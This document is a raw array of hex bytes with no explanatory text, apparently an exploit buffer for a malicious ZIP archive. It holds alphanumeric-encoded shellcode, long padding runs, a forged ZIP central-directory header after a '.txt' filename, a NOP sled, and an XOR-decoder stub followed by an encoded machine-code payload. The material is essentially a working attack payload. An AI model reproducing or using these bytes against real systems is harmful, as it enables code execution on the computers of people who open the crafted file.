0x58, 0x4C, 0x4B, 0x59, 0x89, 0x05, 0x8A, 0x9B, 0x98, 0x98, 0x98, 0x4F, 0x49, 0x49, 0x49, 0x49,
0x49, 0x49, 0x51, 0x5A, 0x56, 0x54, 0x58, 0x36, 0x33, 0x30, 0x56, 0x58, 0x34, 0x41, 0x30, 0x42,
0x36, 0x48, 0x48, 0x30, 0x42, 0x33, 0x30, 0x42, 0x43, 0x56, 0x58, 0x32, 0x42, 0x44, 0x42, 0x48,
0x34, 0x41, 0x32, 0x41, 0x44, 0x30, 0x41, 0x44, 0x54, 0x42, 0x44, 0x51, 0x42, 0x30, 0x41, 0x44,
0x41, 0x56, 0x58, 0x34, 0x5A, 0x38, 0x42, 0x44, 0x4A, 0x4F, 0x4D, 0x4E, 0x4F, 0x4C, 0x36, 0x4B,
0x4E, 0x4D, 0x54, 0x4A, 0x4E, 0x49, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x42, 0x36, 0x4B,
0x38, 0x4E, 0x46, 0x46, 0x42, 0x46, 0x42, 0x4B, 0x58, 0x45, 0x44, 0x4E, 0x43, 0x4B, 0x38, 0x4E,
0x37, 0x45, 0x30, 0x4A, 0x57, 0x41, 0x50, 0x4F, 0x4E, 0x4B, 0x48, 0x4F, 0x34, 0x4A, 0x51, 0x4B,
0x38, 0x4F, 0x45, 0x42, 0x32, 0x41, 0x30, 0x4B, 0x4E, 0x49, 0x44, 0x4B, 0x38, 0x46, 0x43, 0x4B,
0x58, 0x41, 0x50, 0x50, 0x4E, 0x41, 0x43, 0x42, 0x4C, 0x49, 0x59, 0x4E, 0x4A, 0x46, 0x58, 0x42,
0x4C, 0x46, 0x37, 0x47, 0x30, 0x41, 0x4C, 0x4C, 0x4C, 0x4D, 0x30, 0x41, 0x30, 0x44, 0x4C, 0x4B,
0x4E, 0x46, 0x4F, 0x4B, 0x33, 0x46, 0x35, 0x46, 0x32, 0x4A, 0x52, 0x45, 0x57, 0x45, 0x4E, 0x4B,
0x48, 0x4F, 0x35, 0x46, 0x42, 0x41, 0x30, 0x4B, 0x4E, 0x48, 0x36, 0x4B, 0x58, 0x4E, 0x50, 0x4B,
0x54, 0x4B, 0x48, 0x4F, 0x35, 0x4E, 0x41, 0x41, 0x30, 0x4B, 0x4E, 0x43, 0x30, 0x4E, 0x52, 0x4B,
0x58, 0x49, 0x48, 0x4E, 0x56, 0x46, 0x32, 0x4E, 0x31, 0x41, 0x36, 0x43, 0x4C, 0x41, 0x43, 0x4B,
0x4D, 0x46, 0x56, 0x4B, 0x48, 0x43, 0x44, 0x42, 0x53, 0x4B, 0x48, 0x42, 0x44, 0x4E, 0x50, 0x4B,
0x38, 0x42, 0x37, 0x4E, 0x41, 0x4D, 0x4A, 0x4B, 0x48, 0x42, 0x44, 0x4A, 0x30, 0x50, 0x45, 0x4A,
0x36, 0x50, 0x38, 0x50, 0x44, 0x50, 0x30, 0x4E, 0x4E, 0x42, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x48,
0x46, 0x43, 0x45, 0x48, 0x56, 0x4A, 0x46, 0x43, 0x43, 0x44, 0x33, 0x4A, 0x56, 0x47, 0x37, 0x43,
0x37, 0x44, 0x43, 0x4F, 0x55, 0x46, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x4B, 0x4C, 0x4D,
0x4E, 0x4E, 0x4F, 0x4B, 0x33, 0x42, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4F, 0x45, 0x49, 0x58, 0x45,
0x4E, 0x48, 0x56, 0x41, 0x48, 0x4D, 0x4E, 0x4A, 0x50, 0x44, 0x30, 0x45, 0x35, 0x4C, 0x36, 0x44,
0x50, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x49, 0x4D, 0x49, 0x50, 0x45, 0x4F, 0x4D, 0x4A, 0x47,
0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x43, 0x45, 0x43, 0x35, 0x43, 0x35, 0x43, 0x35, 0x43,
0x54, 0x43, 0x55, 0x43, 0x54, 0x43, 0x35, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4A, 0x56, 0x41,
0x41, 0x4E, 0x45, 0x48, 0x56, 0x43, 0x45, 0x49, 0x48, 0x41, 0x4E, 0x45, 0x59, 0x4A, 0x46, 0x46,
0x4A, 0x4C, 0x31, 0x42, 0x57, 0x47, 0x4C, 0x47, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C, 0x36, 0x42,
0x41, 0x41, 0x35, 0x45, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x46, 0x4A, 0x4D, 0x4A, 0x50,
0x32, 0x49, 0x4E, 0x47, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x45, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x56, 0x45, 0x4E, 0x49, 0x54, 0x48, 0x58, 0x49, 0x44, 0x47, 0x45, 0x4F, 0x4F, 0x48,
0x4D, 0x42, 0x35, 0x46, 0x55, 0x46, 0x55, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x43, 0x39, 0x4A,
0x36, 0x47, 0x4E, 0x49, 0x47, 0x48, 0x4C, 0x49, 0x57, 0x47, 0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x45,
0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4C, 0x56, 0x46, 0x36, 0x48, 0x36, 0x4A, 0x56, 0x43,
0x46, 0x4D, 0x36, 0x49, 0x48, 0x45, 0x4E, 0x4C, 0x46, 0x42, 0x45, 0x49, 0x35, 0x49, 0x32, 0x4E,
0x4C, 0x49, 0x38, 0x47, 0x4E, 0x4C, 0x56, 0x46, 0x34, 0x49, 0x58, 0x44, 0x4E, 0x41, 0x43, 0x42,
0x4C, 0x43, 0x4F, 0x4C, 0x4A, 0x50, 0x4F, 0x44, 0x54, 0x4D, 0x32, 0x50, 0x4F, 0x44, 0x34, 0x4E,
0x52, 0x43, 0x39, 0x4D, 0x38, 0x4C, 0x37, 0x4A, 0x33, 0x4B, 0x4A, 0x4B, 0x4A, 0x4B, 0x4A, 0x4A,
0x56, 0x44, 0x57, 0x50, 0x4F, 0x43, 0x4B, 0x48, 0x41, 0x4F, 0x4F, 0x45, 0x37, 0x46, 0x44, 0x4F,
0x4F, 0x48, 0x4D, 0x4B, 0x45, 0x47, 0x45, 0x44, 0x55, 0x41, 0x35, 0x41, 0x45, 0x41, 0x35, 0x4C,
0x36, 0x41, 0x30, 0x41, 0x55, 0x41, 0x45, 0x45, 0x45, 0x41, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A,
0x46, 0x4D, 0x4A, 0x49, 0x4D, 0x45, 0x30, 0x50, 0x4C, 0x43, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C,
0x36, 0x4F, 0x4F, 0x4F, 0x4F, 0x47, 0x43, 0x4F, 0x4F, 0x42, 0x4D, 0x4B, 0x48, 0x47, 0x45, 0x4E,
0x4F, 0x43, 0x58, 0x46, 0x4C, 0x46, 0x46, 0x4F, 0x4F, 0x48, 0x4D, 0x44, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x56, 0x42, 0x4F, 0x4C, 0x48, 0x46, 0x50, 0x4F, 0x45, 0x43, 0x55, 0x4F, 0x4F, 0x48,
0x4D, 0x4F, 0x4F, 0x42, 0x4D, 0x5A, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x41, 0x49, 0x89, 0x04, 0x02, 0x12, 0x01, 0x61, 0x82, 0xFD, 0x81, 0x98, 0x98, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x2E, 0x74,
0x78, 0x74, 0x50, 0x4B, 0x01, 0x02, 0x14, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC,
0xCE, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45,
0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,
0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x41, 0x42, 0x43, 0x44, 0x45, 0x58, 0x58, 0x58, 0x58, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x31, 0xC9, 0x83, 0xE9, 0xB0, 0xD9, 0xEE, 0xD9, 0x74,
0x24, 0xF4, 0x5B, 0x81, 0x73, 0x13, 0x50, 0x8A, 0xFA, 0x90, 0x83, 0xEB, 0xFC, 0xE2, 0xF4, 0xAC,
0xE0, 0x11, 0xDD, 0xB8, 0x73, 0x05, 0x6F, 0xAF, 0xEA, 0x71, 0xFC, 0x74, 0xAE, 0x71, 0xD5, 0x6C,
0x01, 0x86, 0x95, 0x28, 0x8B, 0x15, 0x1B, 0x1F, 0x92, 0x71, 0xCF, 0x70, 0x8B, 0x11, 0xD9, 0xDB,
0xBE, 0x71, 0x91, 0xBE, 0xBB, 0x3A, 0x09, 0xFC, 0x0E, 0x3A, 0xE4, 0x57, 0x4B, 0x30, 0x9D, 0x51,
0x48, 0x11, 0x64, 0x6B, 0xDE, 0xDE, 0xB8, 0x25, 0x6F, 0x71, 0xCF, 0x74, 0x8B, 0x11, 0xF6, 0xDB,
0x86, 0xB1, 0x1B, 0x0F, 0x96, 0xFB, 0x7B, 0x53, 0xA6, 0x71, 0x19, 0x3C, 0xAE, 0xE6, 0xF1, 0x93,
0xBB, 0x21, 0xF4, 0xDB, 0xC9, 0xCA, 0x1B, 0x10, 0x86, 0x71, 0xE0, 0x4C, 0x27, 0x71, 0xD0, 0x58,
0xD4, 0x92, 0x1E, 0x1E, 0x84, 0x16, 0xC0, 0xAF, 0x5C, 0x9C, 0xC3, 0x36, 0xE2, 0xC9, 0xA2, 0x38,
0xFD, 0x89, 0xA2, 0x0F, 0xDE, 0x05, 0x40, 0x38, 0x41, 0x17, 0x6C, 0x6B, 0xDA, 0x05, 0x46, 0x0F,
0x03, 0x1F, 0xF6, 0xD1, 0x67, 0xF2, 0x92, 0x05, 0xE0, 0xF8, 0x6F, 0x80, 0xE2, 0x23, 0x99, 0xA5,
0x27, 0xAD, 0x6F, 0x86, 0xD9, 0xA9, 0xC3, 0x03, 0xD9, 0xB9, 0xC3, 0x13, 0xD9, 0x05, 0x40, 0x36,
0xE2, 0xEB, 0xCC, 0x36, 0xD9, 0x73, 0x71, 0xC5, 0xE2, 0x5E, 0x8A, 0x20, 0x4D, 0xAD, 0x6F, 0x86,
0xE0, 0xEA, 0xC1, 0x05, 0x75, 0x2A, 0xF8, 0xF4, 0x27, 0xD4, 0x79, 0x07, 0x75, 0x2C, 0xC3, 0x05,
0x75, 0x2A, 0xF8, 0xB5, 0xC3, 0x7C, 0xD9, 0x07, 0x75, 0x2C, 0xC0, 0x04, 0xDE, 0xAF, 0x6F, 0x80,
0x19, 0x92, 0x77, 0x29, 0x4C, 0x83, 0xC7, 0xAF, 0x5C, 0xAF, 0x6F, 0x80, 0xEC, 0x90, 0xF4, 0x36,
0xE2, 0x99, 0xFD, 0xD9, 0x6F, 0x90, 0xC0, 0x09, 0xA3, 0x36, 0x19, 0xB7, 0xE0, 0xBE, 0x19, 0xB2,
0xBB, 0x3A, 0x63, 0xFA, 0x74, 0xB8, 0xBD, 0xAE, 0xC8, 0xD6, 0x03, 0xDD, 0xF0, 0xC2, 0x3B, 0xFB,
0x21, 0x92, 0xE2, 0xAE, 0x39, 0xEC, 0x6F, 0x25, 0xCE, 0x05, 0x46, 0x0B, 0xDD, 0xA8, 0xC1, 0x01,
0xDB, 0x90, 0x91, 0x01, 0xDB, 0xAF, 0xC1, 0xAF, 0x5A, 0x92, 0x3D, 0x89, 0x8F, 0x34, 0xC3, 0xAF,
0x5C, 0x90, 0x6F, 0xAF, 0xBD, 0x05, 0x40, 0xDB, 0xDD, 0x06, 0x13, 0x94, 0xEE, 0x05, 0x46, 0x02,
0x75, 0x2A, 0xF8, 0x2E, 0x52, 0x18, 0xE3, 0x03, 0x75, 0x2C, 0x6F, 0x80, 0x8A, 0xFA, 0x90, 0x00,
0x69, 0x4A, 0x58, 0x43, 0x53, 0x35, 0x70, 0x43, 0x4B, 0x4E, 0x70, 0x4F, 0x78, 0x4A, 0x4F, 0x38,
0x4E, 0x6B, 0x30, 0x43, 0x30, 0x63, 0x38, 0x65, 0x48, 0x4B, 0x4E, 0x71, 0x7A, 0x7A, 0x6E, 0x50,
0x57, 0x39, 0x6F, 0x79, 0x57, 0x31, 0x53, 0x42, 0x4D, 0x6F, 0x74, 0x6E, 0x4E, 0x61, 0x55, 0x51,
0x68, 0x61, 0x55, 0x6B, 0x70, 0x4E, 0x4F, 0x70, 0x63, 0x6B, 0x70, 0x52, 0x4E, 0x4F, 0x75, 0x71,
0x64, 0x6D, 0x50, 0x52, 0x55, 0x70, 0x73, 0x71, 0x55, 0x50, 0x72, 0x6D, 0x50, 0x25, 0x73, 0x6B,
0x70, 0x25, 0x73, 0x6D, 0x50, 0x6E, 0x4F, 0x51, 0x31, 0x4F, 0x54, 0x4E, 0x64, 0x6F, 0x30, 0x6D,
0x56, 0x4D, 0x56, 0x4D, 0x50, 0x70, 0x6E, 0x4F, 0x75, 0x72, 0x54, 0x4D, 0x50, 0x30, 0x6C, 0x42,
0x4F, 0x71, 0x53, 0x33, 0x31, 0x50, 0x6C, 0x43, 0x37, 0x70, 0x72, 0x70, 0x6F, 0x62, 0x55, 0x30,
0x70, 0x6B, 0x70, 0x6F, 0x51, 0x6F, 0x74, 0x50, 0x6D, 0x6F, 0x79, 0x50, 0x6E, 0x31, 0x59, 0x54,
0x33, 0x70, 0x74, 0x54, 0x32, 0x61, 0x51, 0x50, 0x74, 0x70, 0x6F, 0x31, 0x62, 0x42, 0x53, 0x6B,
0x70, 0x25, 0x73, 0x4D, 0x50, 0x4E, 0x4F, 0x4F, 0x51, 0x61, 0x34, 0x6F, 0x54, 0x6B, 0x50, 0x41,
0x00, 0x4B, 0x38, 0x4F, 0x45, 0x42, 0x32, 0x41, 0x30, 0x4B, 0x4E, 0x49, 0x44, 0x4B, 0x38, 0x46,
0x43, 0x4B, 0x58, 0x41, 0x50, 0x50, 0x4E, 0x41, 0x43, 0x42, 0x4C, 0x49, 0x59, 0x4E, 0x4A, 0x46,
0x58, 0x42, 0x4C, 0x46, 0x37, 0x47, 0x30, 0x41, 0x4C, 0x4C, 0x4C, 0x4D, 0x30, 0x41, 0x30, 0x44,
0x4C, 0x4B, 0x4E, 0x46, 0x4F, 0x4B, 0x33, 0x46, 0x35, 0x46, 0x32, 0x4A, 0x52, 0x45, 0x57, 0x45,
0x4E, 0x4B, 0x48, 0x4F, 0x35, 0x46, 0x42, 0x41, 0x30, 0x4B, 0x4E, 0x48, 0x36, 0x4B, 0x58, 0x4E,
0x50, 0x4B, 0x54, 0x4B, 0x48, 0x4F, 0x35, 0x4E, 0x41, 0x41, 0x30, 0x4B, 0x4E, 0x43, 0x30, 0x4E,
0x52, 0x4B, 0x58, 0x49, 0x48, 0x4E, 0x56, 0x46, 0x32, 0x4E, 0x31, 0x41, 0x36, 0x43, 0x4C, 0x41,
0x43, 0x4B, 0x4D, 0x46, 0x56, 0x4B, 0x48, 0x43, 0x44, 0x42, 0x53, 0x4B, 0x48, 0x42, 0x44, 0x4E,
0x50, 0x4B, 0x38, 0x42, 0x37, 0x4E, 0x41, 0x4D, 0x4A, 0x4B, 0x48, 0x42, 0x44, 0x4A, 0x30, 0x50,
0x45, 0x4A, 0x36, 0x50, 0x38, 0x50, 0x44, 0x50, 0x30, 0x4E, 0x4E, 0x42, 0x35, 0x4F, 0x4F, 0x48,
0x4D, 0x48, 0x46, 0x43, 0x45, 0x48, 0x56, 0x4A, 0x46, 0x43, 0x43, 0x44, 0x33, 0x4A, 0x56, 0x47,
0x37, 0x43, 0x37, 0x44, 0x43, 0x4F, 0x55, 0x46, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x4B,
0x4C, 0x4D, 0x4E, 0x4E, 0x4F, 0x4B, 0x33, 0x42, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4F, 0x45, 0x49,
0x58, 0x45, 0x4E, 0x48, 0x56, 0x41, 0x48, 0x4D, 0x4E, 0x4A, 0x50, 0x44, 0x30, 0x45, 0x35, 0x4C,
0x36, 0x44, 0x50, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x49, 0x4D, 0x49, 0x50, 0x45, 0x4F, 0x4D,
0x4A, 0x47, 0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x43, 0x45, 0x43, 0x35, 0x43, 0x35, 0x43,
0x35, 0x43, 0x54, 0x43, 0x55, 0x43, 0x54, 0x43, 0x35, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4A,
0x56, 0x41, 0x41, 0x4E, 0x45, 0x48, 0x56, 0x43, 0x45, 0x49, 0x48, 0x41, 0x4E, 0x45, 0x59, 0x4A,
0x46, 0x46, 0x4A, 0x4C, 0x31, 0x42, 0x57, 0x47, 0x4C, 0x47, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C,
0x36, 0x42, 0x41, 0x41, 0x35, 0x45, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x46, 0x4A, 0x4D,
0x4A, 0x50, 0x32, 0x49, 0x4E, 0x47, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x45, 0x45, 0x4F,
0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x45, 0x4E, 0x49, 0x54, 0x48, 0x58, 0x49, 0x44, 0x47, 0x45, 0x4F,
0x4F, 0x48, 0x4D, 0x42, 0x35, 0x46, 0x55, 0x46, 0x55, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x43,
0x39, 0x4A, 0x36, 0x47, 0x4E, 0x49, 0x47, 0x48, 0x4C, 0x49, 0x57, 0x47, 0x45, 0x4F, 0x4F, 0x48,
0x4D, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4C, 0x56, 0x46, 0x36, 0x48, 0x36, 0x4A,
0x56, 0x43, 0x46, 0x4D, 0x36, 0x49, 0x48, 0x45, 0x4E, 0x4C, 0x46, 0x42, 0x45, 0x49, 0x35, 0x49,
0x32, 0x4E, 0x4C, 0x49, 0x38, 0x47, 0x4E, 0x4C, 0x56, 0x46, 0x34, 0x49, 0x58, 0x44, 0x4E, 0x41,
0x43, 0x42, 0x4C, 0x43, 0x4F, 0x4C, 0x4A, 0x50, 0x4F, 0x44, 0x54, 0x4D, 0x32, 0x50, 0x4F, 0x44,
0x34, 0x4E, 0x52, 0x43, 0x39, 0x4D, 0x38, 0x4C, 0x37, 0x4A, 0x33, 0x4B, 0x4A, 0x4B, 0x4A, 0x4B,
0x4A, 0x4A, 0x56, 0x44, 0x57, 0x50, 0x4F, 0x43, 0x4B, 0x48, 0x41, 0x4F, 0x4F, 0x45, 0x37, 0x46,
0x44, 0x4F, 0x4F, 0x48, 0x4D, 0x4B, 0x45, 0x47, 0x45, 0x44, 0x55, 0x41, 0x35, 0x41, 0x45, 0x41,
0x35, 0x4C, 0x36, 0x41, 0x30, 0x41, 0x55, 0x41, 0x45, 0x45, 0x45, 0x41, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x46, 0x4D, 0x4A, 0x49, 0x4D, 0x45, 0x30, 0x50, 0x4C, 0x43, 0x55, 0x4F, 0x4F, 0x48,
0x4D, 0x4C, 0x36, 0x4F, 0x4F, 0x4F, 0x4F, 0x47, 0x43, 0x4F, 0x4F, 0x42, 0x4D, 0x4B, 0x48, 0x47,
0x45, 0x4E, 0x4F, 0x43, 0x58, 0x46, 0x4C, 0x46, 0x46, 0x4F, 0x4F, 0x48, 0x4D, 0x44, 0x45, 0x4F,
0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x42, 0x4F, 0x4C, 0x48, 0x46, 0x50, 0x4F, 0x45, 0x43, 0x55, 0x4F,
0x4F, 0x48, 0x4D, 0x4F, 0x4F, 0x42, 0x4D, 0x5A, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
